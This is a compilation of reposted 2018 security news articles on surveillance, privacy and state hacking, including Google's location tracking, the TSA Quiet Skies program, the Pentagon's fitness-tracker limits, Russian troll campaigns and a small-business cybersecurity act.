This new act is a great help in assisting those small businesses that wish to improve their cybersecurity to do so. But it needs to be made a requirement before it will seriously improve the overall cybersecurity posture of the nation.

Senate Passes MAIN STREET Cybersecurity Act for Small Business
16.8.18 securityweek BigBrothers

The U.S. Senate has passed the MAIN STREET Cybersecurity Act on Sept. 28, which will require NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

Co-sponsored by Senators Maria Cantwell (D-WA), Brian Schatz (D-HI), James Risch (R-ID), John Thune (R-SD) and Bill Nelson (D-Fla.), and introduced in March 2017, MAIN STREET's full title is 'Making Available Information Now to Strengthen Trust and Resilience and Enhance Enterprise Technology Cybersecurity Act of 2017'.

The basic requirement is that NIST shall provide cybersecurity resources specifically geared for small businesses (SMEs). Those resources are to promote awareness of simple, basic controls; a workplace cybersecurity culture; and third-party stakeholder relationships, in order to assist SMEs in mitigating common cybersecurity risks. The resources are to be technology-neutral and implementable using commercial off-the-shelf technologies.

They are to be consistent with the requirements of the Cybersecurity Enhancement Act of 2014, which gave more weight and support to the NIST Cybersecurity Framework. While widely used by large organizations, the NIST framework is usually ignored by SMEs.

In a statement of support for MAIN STREET issued in March, Sen. John Thune, chairman of the Senate Committee on Commerce, Science, and Transportation, pointed out that SMEs provide more than half of all jobs in the U.S., but are unprepared for the effect of cyberattacks. According to figures from the National Cybersecurity Alliance, 60% of small businesses are forced to close following an attack.

"Cyberattacks can have catastrophic effects on small businesses and their customers," he said. "This legislation offers important resources, specifically meeting the unique needs of small businesses, to help them guard sensitive data and systems from thieves and hackers."

"In 2012, nearly 71 percent of cyberattacks occurred in businesses with fewer than 100 employees," said Senator Risch. "These attacks seriously compromise not only the businesses, but also their employees' and customers' personal information. As we work to reduce our nation's cyber vulnerabilities, we must be equally mindful of our responsibility to uniformly educate all small business owners on how to deter these threats."

The small business version of the NIST Framework will need to provide a cybersecurity framework that does not require the high level of investment needed for the full NIST Framework. However, like the full version, it will be voluntary for businesses. Whether SMBs actually derive practical benefit remains to be seen.

The Ponemon 2016 State of Cybersecurity in SMBs survey found that 50% of small businesses had suffered a data breach in the previous 12 months. SMEs are clearly a target for cybercriminal attacks, but are unprepared to stop them. The primary reasons are twofold: SMEs often think they are too small to be a target, and that effective security can only be achieved with the resources of a large organization.

The first is simply wrong: small businesses are increasingly targeted for extortion (such as ransomware) and credential theft (especially where that business might be part of the supply chain of larger organizations). It is hoped that the new small business Cybersecurity Act will change the second.

A survey of 1,420 small business owners published in March 2017 by Manta suggests that only 69% of small business owners currently have controls in place to prevent hacks -- meaning 1 in 3 small business owners have no safeguards in place. Where controls are used, they tend to be basic: such as antivirus software (17%), firewalls (16%), and spam filters (14%).

"Overall," concludes Manta, "with the growth in hackers targeting small businesses, owners should invest more heavily in cyber defense to prevent attacks, which can often be more crippling for a small business than a large corporation."

Andy Halataei, Senior Vice President for Government Affairs of the Information Technology Industry Council, said at the time the bill was introduced, "Small businesses often don't have the resources they need to guard against sophisticated cyber-attacks, and this legislation can be the helping hand small businesses need to help reduce their cybersecurity risks." He added, "By offering small businesses federal agencies' resources and coordinated support, they can better manage risks, protect customer privacy, and focus on growing their ventures."

The reality for small businesses today is that they face threats from both criminals and government legislation. Legal regulatory requirements, like common cybercriminals, do not differentiate hugely between large and small businesses. For example, any business of whatever size that does business with a member state of the European Union will be subject to the strict requirements of the European General Data Protection Regulation (GDPR) by May 2018.

The MAIN STREET Cybersecurity Act of 2017 will hopefully help SMEs protect themselves from both hackers and regulators. It is expected that this Act will rapidly pass through the final stages to become law.

FBI Eyes Plethora of River-Related Threats
15.8.18 securityweek BigBrothers

NEW ORLEANS (AP) — Giant cranes loading and unloading gargantuan barges. Oil tankers, supply vessels and pipelines serving a vital energy industry. Flood control structures. Chemical plants. Cruise ships. Drinking water sources. All computer-reliant and tied in some way to the internet. All of them vulnerable to cyber thieves, hackers and terrorists.

Roughly nine months into his job as special agent in charge of the New Orleans office of the FBI, agent Eric Rommal is keenly aware of the dangers cyber-criminals pose to Mississippi River-related businesses and south Louisiana infrastructure.

"Louisiana is a major cyber vulnerability area," Rommal told The Associated Press in an interview.

"Every time that we have a vessel that travels up or down the Mississippi River there's a vulnerability: that that vessel or persons on those vessels may in fact be doing harm to our systems," said Rommal. "And that affects the national economy and affects the entire United States."

Rommal, accompanied by Matthew Ramey, who supervises the office's cyber squad, and Drew Watts, an assistant special agent in charge, discussed a litany of vulnerable areas and the ways the FBI in New Orleans works to protect them.


"When it relates to commerce and the economy throughout the United States, oil and gas — it all starts here," said Rommal. "And when those systems are compromised, it doesn't just affect Louisiana. It affects the entire nation."


A cyber disruption of security systems that protect pipelines and refineries "could essentially cripple the oil and gas industry until we could get that system up and running again," said Rommal.

Energy isn't the only concern.

"The ports that are along the Mississippi River — many may think of them as an agricultural or a petroleum depot. But what we need to know more about is that each one of those systems is controlled by sort of computer network that allows barges to be off-loaded, loaded," he said.

A hacker disrupting those operations could effectively disrupt nationwide and international commerce, he said, until it could be manually restored.


Ports and the businesses that use them are susceptible to theft of money or critical information, Ramey said. And the theft can be state-sponsored.

"That would be, say, the Chinese, the Russians, the Iranians, the North Koreans, want to compromise the ports for, say, some sort of economic or secretive information. The maritime and the port industry are susceptible to what we call BEC — business email compromises," Ramey said.

"Wire transfers are going out all the time, 24/7. If the attacker can insert himself into that email chain, they can assume the identity of the person who controls that account." And that can lead to money being diverted to unintended sources.

FBI statistics show some 41,000 victims lost $2.9 billion to cyber-thieves nationally from October 2013 to May 2018, said Ramey. Over $5 million left the state in 2017 due to cyber-thieves, he said, adding: "In 2018, we're on track to surpass that."


Offshore there are drilling rigs and production platforms. Inland, refineries and chemical plants line the river. Compromise of their computer systems and safety systems could lead to disaster, Rommal said.

"We're confident that the internal security systems owned by each one of those companies have mitigation plans to prevent terrible disasters from happening," he said. "But, nonetheless, it's something that we think about every day."

In addition, the agents acknowledged threats to public utilities — New Orleans, for instance, draws its drinking water from the river — and various flood-control structures and pumping systems.



Rommal said more than 20 people working for the FBI headquarters in Louisiana are working on cyber security.

They include experts working at forensics labs, doing forensics on computer hard drives and developing techniques for analyzing computer memories in efforts to fight and find intruders.

And, Rommal said, there are partnerships with other federal agencies, including a joint effort known as the National Cyber Investigative Joint Terrorism Task Force.

There is also the national InfraGard, an FBI program that enlists thousands of private-industry partners from potential cybercrime target sectors, such as transportation, energy, banking and infrastructure. Ramey said there are 800 members in Louisiana.

Participants can provide and receive real-time information on imminent cyber threats.

The FBI also maintains a website for its Internet Crime Complaint Center. It's a mechanism for businesses and individuals to report cybercrime, and a source of information on the ever-evolving threat.

"We're not in this fight alone," said Rommal. "And it is a fight."

UK Police Deploy Homemade Mobile Fingerprint Scanners
15.8.18 securityweek BigBrothers

The UK Metropolitan Police Service -- the Met, the UK's largest police force and one of the largest in the world -- has introduced a new portable fingerprint scanner. This is not the first portable scanner used by the Met, but differs from the earlier option by being developed in-house.

Known as INK (identity not known), it combines software produced in-house by Met staff with an Android mobile phone paired with a Cross Match Technologies fingerprint reader. The device communicates securely with the Home Office Biometric Services Gateway (BSG), which then searches the Criminal Records Office (IDENT1) and immigration enforcement (IABS) databases.

If a suspect has a criminal record, the Met says, or is known to immigration enforcement, his or her identity can be confirmed at the roadside. An officer, with relevant access levels, can also use the device to check the Police National Computer to establish if they are currently wanted for any outstanding offences.

The statement made it clear that all fingerprints taken on the device are deleted automatically once the officer logs off the device. The 2017 Vault 7 CIA documents leaked by WikiLeaks seem to indicate that the CIA used a tool called ExpressLane to surreptitiously collect biometric data recorded by other Cross Match devices in the U.S.

Miami-based Cross Match Technologies provides biometric management systems to law enforcement and governments. In 2011 it was reported that a Cross Match device was used to identify Osama Bin Laden, allowing then president Obama to announce his death.

UK Met Police Fingerprint scanner

For now, the Met devices cannot be used to increase the size of the national fingerprint database regardless of whether the subject is convicted of a crime. However, there seems little to prevent this development in the future.

The Police and Criminal Evidence Act 1984 (PACE) allows fingerprints to be taken if a constable reasonably suspects the subject of committing or attempting to commit an offence, or they have committed or attempted to commit an offence, and: the name of the person is unknown to, and cannot be readily ascertained by, the constable -- or if the constable has reasonable grounds for doubting whether a name given by the person is their real name.

Again under PACE, fingerprints may be stored by the police for 2-3 years (more if the courts grant an extension) or indefinitely if the subject is subsequently convicted of an offence. However, it is worth noting that European attitudes towards fingerprinting are changing. In April 2018, the European Commission proposed that all identity cards held by European citizens should be required to include a digital image of the holder's fingerprints.

The driving force behind the new scanners is, however, economy of both police funds and officers' time. Project lead Superintendent Adrian Hutchinson explained, "Mobile identification technology helps officers to do their jobs efficiently and effectively. For example, if police stop a driver for a traffic violation but the driver has no documents on him and the car is registered to another person, officers may not be happy that the name given is correct. INK can allow them to confirm the identity to allow the service of a summons, rather than arrest them and take them to a police station where they then confirm their identity. Also, if the person is wanted for other offences, this device will allow us to establish this at the point they are stopped."

The reduced cost of the new devices will allow the Met to increase their usage from less than 100 to 600 devices in the field, to be rolled out over the next six months. It is believed that the failure rate for a scanned fingerprint is around one in 7,000.

It is not immediately clear whether this is the same device that was described by the West Yorkshire Police earlier this year. On 10 February, the Home Office announced, "An app on an officer's phone, combined with a handheld scanner, will mean police will be able to check fingerprints against both criminal and immigration records by connecting to the two live databases (IDENT1 and IABS) via the new Biometric Services Gateway... It is expected that another 20 forces across the country will roll out the system by the end of this year."

A Westminster press conference that would have answered such details, scheduled for Tuesday, was canceled following an incident at Westminster on Monday evening. A vehicle was driven at speed into crash barriers outside the Houses of Parliament, injuring several pedestrians and cyclists. It is being treated as terror-related and investigated by the Met's counter-terrorism police -- who have said that the identity of the driver is not yet confirmed.

Google tracks users’ movements even if they have disabled the “Location History” on devices
14.8.18 securityaffairs BigBrothers

According to the AP, many Google services on both Android and iPhone store records of user location even if the users have disabled the “Location History”.
According to a recent investigation conducted by the Associated Press, many Google services on both Android and iPhone devices store records of user location data, and the bad news is that they do it even if the users have disabled the “Location History” on devices.

When a user disables the “Location History” in the privacy settings of Google applications, this should prevent Google from storing location data.

In practice the situation is quite different: experts from the AP discovered that even when users have turned off Location History, some Google apps automatically store “time-stamped location data” without explicit authorization.

“Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: ‘You can turn off Location History at any time. With Location History off, the places you go are no longer stored.’

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking. (It’s possible, although laborious, to delete it.)” reads the post published by the AP.

“For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are.”

“And some searches that have nothing to do with location, like ‘chocolate chip cookies,’ or ‘kids science kits,’ pinpoint your precise latitude and longitude—accurate to the square foot—and save it to your Google account.”

The AP used location data from an Android smartphone with ‘Location History’ disabled to draw a map of the movements of Princeton postdoctoral researcher Gunes Acar.

Location History

Data plotted on the map includes records of Dr. Acar’s train commute on two trips to New York and visits to the High Line park, Chelsea Market, Hell’s Kitchen, Central Park and Harlem, as well as other markers on the map, including Acar’s home address.

“The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.” continues the AP.
Google replied to the study conducted by the AP with the following statement:

“There are a number of different ways that Google may use location to improve people’s experience, including Location History, Web, and App Activity, and through device-level Location Services. We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time.” states Google.

Jonathan Mayer, a Princeton researcher and former chief technologist for the FCC’s enforcement bureau, remarked that all location history data collection should be disabled when users switch off Location History:

“If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.”

The good news is that it is possible to stop Google from collecting your location: it is sufficient to turn off the “Web and App Activity” setting. With that setting left on, Google will continue to store location markers.

Open your web browser, go to myactivity.google.com, select “Activity Controls” and turn off both the “Web & App Activity” and “Location History” features.

For Android Devices:
Go to the “Security & location” setting, select “Privacy”, and tap “Location” and toggle it off.

For iOS Devices:
Google Maps users can access Settings → Privacy → Location Services and change their location setting to ‘While Using’ the app.

Google Tracks Your Movements, Like It or Not
13.8.18 securityweek BigBrothers

Google wants to know where you go so badly that it records your movements even when you explicitly tell it not to.

An Associated Press investigation found that many Google services on Android devices and iPhones store your location data even if you've used privacy settings that say they will prevent it from doing so.

Computer-science researchers at Princeton confirmed these findings at the AP's request.

For the most part, Google is upfront about asking permission to use your location information. An app like Google Maps will remind you to allow access to location if you use it for navigating. If you agree to let it record your location over time, Google Maps will display that history for you in a "timeline" that maps out your daily movements.

Storing your minute-by-minute travels carries privacy risks and has been used by police to determine the location of suspects — such as a warrant that police in Raleigh, North Carolina, served on Google last year to find devices near a murder scene. So the company will let you "pause" a setting called Location History.

Google says that will prevent the company from remembering where you've been. Google's support page on the subject states: "You can turn off Location History at any time. With Location History off, the places you go are no longer stored."

That isn't true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like "chocolate chip cookies," or "kids science kits," pinpoint your precise latitude and longitude — accurate to the square foot — and save it to your Google account.

The privacy issue affects some two billion users of devices that run Google's Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.

Storing location data in violation of a user's preferences is wrong, said Jonathan Mayer, a Princeton computer scientist and former chief technologist for the Federal Communications Commission's enforcement bureau. A researcher from Mayer's lab confirmed the AP's findings on multiple Android devices; the AP conducted its own tests on several iPhones that found the same behavior.

"If you're going to allow users to turn off something called 'Location History,' then all the places where you maintain location history should be turned off," Mayer said. "That seems like a pretty straightforward position to have."

Google says it is being perfectly clear.

"There are a number of different ways that Google may use location to improve people's experience, including: Location History, Web and App Activity, and through device-level Location Services," a Google spokesperson said in a statement to the AP. "We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time."

To stop Google from saving these location markers, the company says, users can turn off another setting, one that does not specifically reference location information. Called "Web and App Activity" and enabled by default, that setting stores a variety of information from Google apps and websites to your Google account.

When paused, it will prevent activity on any device from being saved to your account. But leaving "Web & App Activity" on and turning "Location History" off only prevents Google from adding your movements to the "timeline," its visualization of your daily travels. It does not stop Google's collection of other location markers.

You can delete these location markers by hand, but it's a painstaking process since you have to select them individually, unless you want to delete all of your stored activity.

You can see the stored location markers on a page in your Google account at myactivity.google.com, although they're typically scattered under several different headers, many of which are unrelated to location.

To demonstrate how powerful these other markers can be, the AP created a visual map of the movements of Princeton postdoctoral researcher Gunes Acar, who carried an Android phone with Location history off, and shared a record of his Google account.

The map includes Acar's train commute on two trips to New York and visits to The High Line park, Chelsea Market, Hell's Kitchen, Central Park and Harlem. To protect his privacy, The AP didn't plot the most telling and frequent marker — his home address.

Huge tech companies are under increasing scrutiny over their data practices, following a series of privacy scandals at Facebook and new data-privacy rules recently adopted by the European Union. Last year, the business news site Quartz found that Google was tracking Android users by collecting the addresses of nearby cellphone towers even if all location services were off. Google changed the practice and insisted it never recorded the data anyway.

Critics say Google's insistence on tracking its users' locations stems from its drive to boost advertising revenue.

"They build advertising information out of data," said Peter Lenz, the senior geospatial analyst at Dstillery, a rival advertising technology company. "More data for them presumably means more profit."

The AP learned of the issue from K. Shankari, a graduate researcher at UC Berkeley who studies the commuting patterns of volunteers in order to help urban planners. She noticed that her Android phone prompted her to rate a shopping trip to Kohl's, even though she had turned Location History off.

"So how did Google Maps know where I was?" she asked in a blog post.

The AP wasn't able to recreate Shankari's experience exactly. But its attempts to do so revealed Google's tracking. The findings disturbed her.

"I am not opposed to background location tracking in principle," she said. "It just really bothers me that it is not explicitly stated."

Google offers a more accurate description of how Location History actually works in a place you'd only see if you turn it off — a popup that appears when you "pause" Location History on your Google account webpage. There the company notes that "some location data may be saved as part of your activity on other Google services, like Search and Maps."

Google offers additional information in a popup that appears if you re-activate the "Web & App Activity" setting — an uncommon action for many users, since this setting is on by default. That popup states that, when active, the setting "saves the things you do on Google sites, apps, and services ... and associated information, like location."

Warnings when you're about to turn Location History off via Android and iPhone device settings are more difficult to interpret. On Android, the popup explains that "places you go with your devices will stop being added to your Location History map." On the iPhone, it simply reads, "None of your Google apps will be able to store location data in Location History."

The iPhone text is technically true if potentially misleading. With Location History off, Google Maps and other apps store your whereabouts in a section of your account called "My Activity," not "Location History."

Since 2014, Google has let advertisers track the effectiveness of online ads at driving foot traffic, a feature that Google has said relies on user location histories.

The company is pushing further into such location-aware tracking to drive ad revenue, which rose 20 percent last year to $95.4 billion. At a Google Marketing Live summit in July, Google executives unveiled a new tool called "local campaigns" that dynamically uses ads to boost in-person store visits. It says it can measure how well a campaign drove foot traffic with data pulled from Google users' location histories.

Google also says location records stored in My Activity are used to target ads. Ad buyers can target ads to specific locations — say, a mile radius around a particular landmark — and typically have to pay more to reach this narrower audience.

While disabling "Web & App Activity" will stop Google from storing location markers, it also prevents Google from storing information generated by searches and other activity. That can limit the effectiveness of the Google Assistant, the company's digital concierge.

Sean O'Brien, a Yale Privacy Lab researcher with whom the AP shared its findings, said it is "disingenuous" for Google to continuously record these locations even when users disable Location History. "To me, it's something people should know," he said.

Quiet Skies, TSA surveillance program targets Ordinary U.S. Citizens

11.8.18 securityaffairs BigBrothers

Journalists have revealed a previously undisclosed surveillance program that targets US citizens, code named ‘Quiet Skies’.
According to the Transportation Security Administration (TSA), which has acknowledged the existence of Quiet Skies, the program has monitored about 5,000 U.S. citizens on domestic flights in recent months.

Quiet Skies was criticized by privacy advocates because the authorities have begun monitoring U.S. citizens that aren’t suspected of a crime or of involvement in terrorist organizations.

The domestic surveillance program aims at collecting extensive information about the movements of the citizens and their behaviour.

“The previously undisclosed program, called ‘Quiet Skies,’” specifically targets travelers who “are not under investigation by any agency and are not in the Terrorist Screening Data Base,” states a bulletin issued in March by the TSA.

The Agency is monitoring individuals who have spent a certain amount of time in specific countries or who have visited those countries within a certain period of time; making a reservation that includes email addresses or phone numbers associated with terrorism suspects could also trigger monitoring.

Passengers remain on the Quiet Skies watch list “for up to 90 days or three encounters, whichever comes first, after entering the United States,” according to the TSA. Travelers are not notified when they have been added to the watch list.

Every day about 40 to 50 people on domestic flights are selected under the Quiet Skies program and on average, air marshals follow and monitor about 35 of them.

Quiet skies program
Source atlantamusic.us

This type of surveillance activity is very expensive and according to the experts it drains resources from other vital activities.

At the time of writing there are no data on the cost of the program or on whether it has allowed the authorities to neutralize any threat.

“Since this initiative launched in March, dozens of air marshals have raised concerns about the Quiet Skies program with senior officials and colleagues, sought legal counsel, and expressed misgivings about the surveillance program, according to interviews and documents reviewed by the Globe.”

Privacy advocates and experts on civil liberties consider the Quiet Skies program worrisome and potentially illegal.

Further details on the program are reported in the article titled “Quiet Skies– A TSA Surveillance Program Targets Ordinary U.S. Citizens” that I have published on the Infosec Institute website.

Pentagon Restricts Use of Fitness Trackers, Other Devices
7.8.18 securityweek  BigBrothers

WASHINGTON (AP) — Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness-tracker or cellphone applications that can reveal their location, according to a new Pentagon order.

The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel, so those capabilities must be turned off in certain operational areas.

Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base.

"These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said.

Defense personnel who aren't in sensitive areas will be able to use the GPS applications if the commanders conclude they don't present a risk. For example, troops exercising at major military bases around the country, such as Fort Hood in Texas or Norfolk Naval Station in Virginia, would likely be able to use the location software on their phones or fitness devices. Troops on missions in more sensitive locations, such as Syria, Iraq, Afghanistan or parts of Africa, meanwhile, would be restricted from using the devices or be required to turn off any location function.

Army Col. Rob Manning, a Pentagon spokesman, said it's a move to ensure the enemy can't easily target U.S. forces.

"It goes back to making sure that we're not giving the enemy an unfair advantage and we're not showcasing the exact locations of our troops worldwide," Manning said.

Concerns about exercise trackers and other electronic devices came to a head in January in the wake of revelations that an interactive, online map was pinpointing troop locations, bases and other sensitive areas around the world.

The Global Heat Map, published by the GPS tracking company Strava, used satellite information to map the locations of subscribers to Strava's fitness service. At the time, the map showed activity from 2015 through September 2017. And while heavily populated areas were well lit, warzones such as Iraq and Syria showed scattered pockets of activity that could denote military or government personnel using fitness trackers as they move around.

The Pentagon immediately launched a review, noting that the electronic signals could potentially disclose the location of troops who are in secret or classified locations or on small forward operating bases in hostile areas.

This is the second memo affecting the use of cellphones and other electronic devices that the department has released in recent months. In May, defense officials laid out new restrictions for the use of cellphones and other mobile wireless devices inside the Pentagon.

That memo called for stricter adherence to long-held practices that require phones be left in storage containers outside secure areas where sensitive matters are discussed. But it also stopped short of banning the devices, and instead made clear that cellphones can still be used in common areas and other offices in the Pentagon if classified information is not present.

The latest memo says the new restrictions include GPS functions on fitness trackers, phones, tablets, smartwatches and other applications.

The Pentagon also said it will provide additional cybersecurity training to include the risks posed by the trackers and other mobile devices.

Heather Pierce, a spokeswoman for Fitbit, said Monday: "Fitbit is committed to protecting consumer privacy and keeping data safe. Unlike a smartphone, location data is not collected by Fitbit unless a user gives us access to the data, and users can always remove our access."

Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.18 securityweek BigBrothers

A Russian shadow looms over the attack on Italian President Mattarella: a coordinated Twitter campaign in which hundreds of profiles invited him to resign.
Cybersecurity experts and Italian media believe that the Italian President Sergio Mattarella is the latest victim of the Russian troll farm.

In the late afternoon of May 27, thousands of Twitter profiles suddenly started spreading messages against the Italian president asking him to resign.

The messages appeared to be a coordinated attack using the hashtag #MattarellaDimettiti (Italian for “Mattarella resign”). Messages using this hashtag spread rapidly across the Internet, many legitimate users started using it as well, and it is quite easy to find similar legitimate messages today.

But someone triggered the protest online, someone with a clear interest in destabilizing the Italian government.

The current vice-premier, Luigi Di Maio, was asking for the indictment of President Mattarella, who had refused to endorse the choice of a candidate for Minister of Economy because of the candidate’s well-known anti-euro position.

Analysis of Twitter revealed that at around two o’clock in the morning there was an anomalous spike in the number of messages against President Mattarella.

President Mattarella

Were they sleepless Italians, or was someone attempting to influence the sentiment of the population on specific topics?

According to the Huffington Post Italy, in just a few minutes about 400 new profiles appeared, all traced back to a single origin, coordinating the misinformation campaign.

The Huffington Post reported that the Italian law enforcement agency Polizia Postale confirmed that the campaign had a single source, but that countermeasures adopted by the attackers made it impossible to locate the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved.” states the Huffington Post citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty Twitter profiles involved in the attack against Italian President Mattarella belonging to completely unsuspecting Italians had been used one or more times by the Internet Research Agency (Ira) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist parties, sovereignists, and anti-Europeans.

This is the conclusion of an analysis conducted on a sample composed of 67% of the archive of Internet Research Agency (Ira) activity that was published by the FiveThirtyEight website.

The website published 3 million Russian troll tweets that were analyzed by the US prosecutor Robert Mueller as part of the investigation of the Russian influence on the 2016 Presidential election.

The huge number of tweets was collected by the researchers Darren Linvill and Patrick Warren from Clemson University.

The archive includes roughly 16,000 tweets in the Italian language. According to the Italian newspaper Corriere della Sera, some of the accounts were particularly active and were fueling discussions against government representatives.

Now let me close with a simple consideration: the online propaganda attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely as part of a wider diversionary strategy.

With more sophisticated technologies it is possible to obtain better results; think of the involvement of artificial intelligence.

Putin has said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than the current ones.

Is the Internet Research Agency itself just one part of a bigger troll farm that already leverages artificial intelligence?

Trump Criticized for Not Leading Effort to Secure Elections
2.8.18 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the '18 election is protected," Graham said recently on CBS' "Face the Nation." "He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the '18 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."

Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.18 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

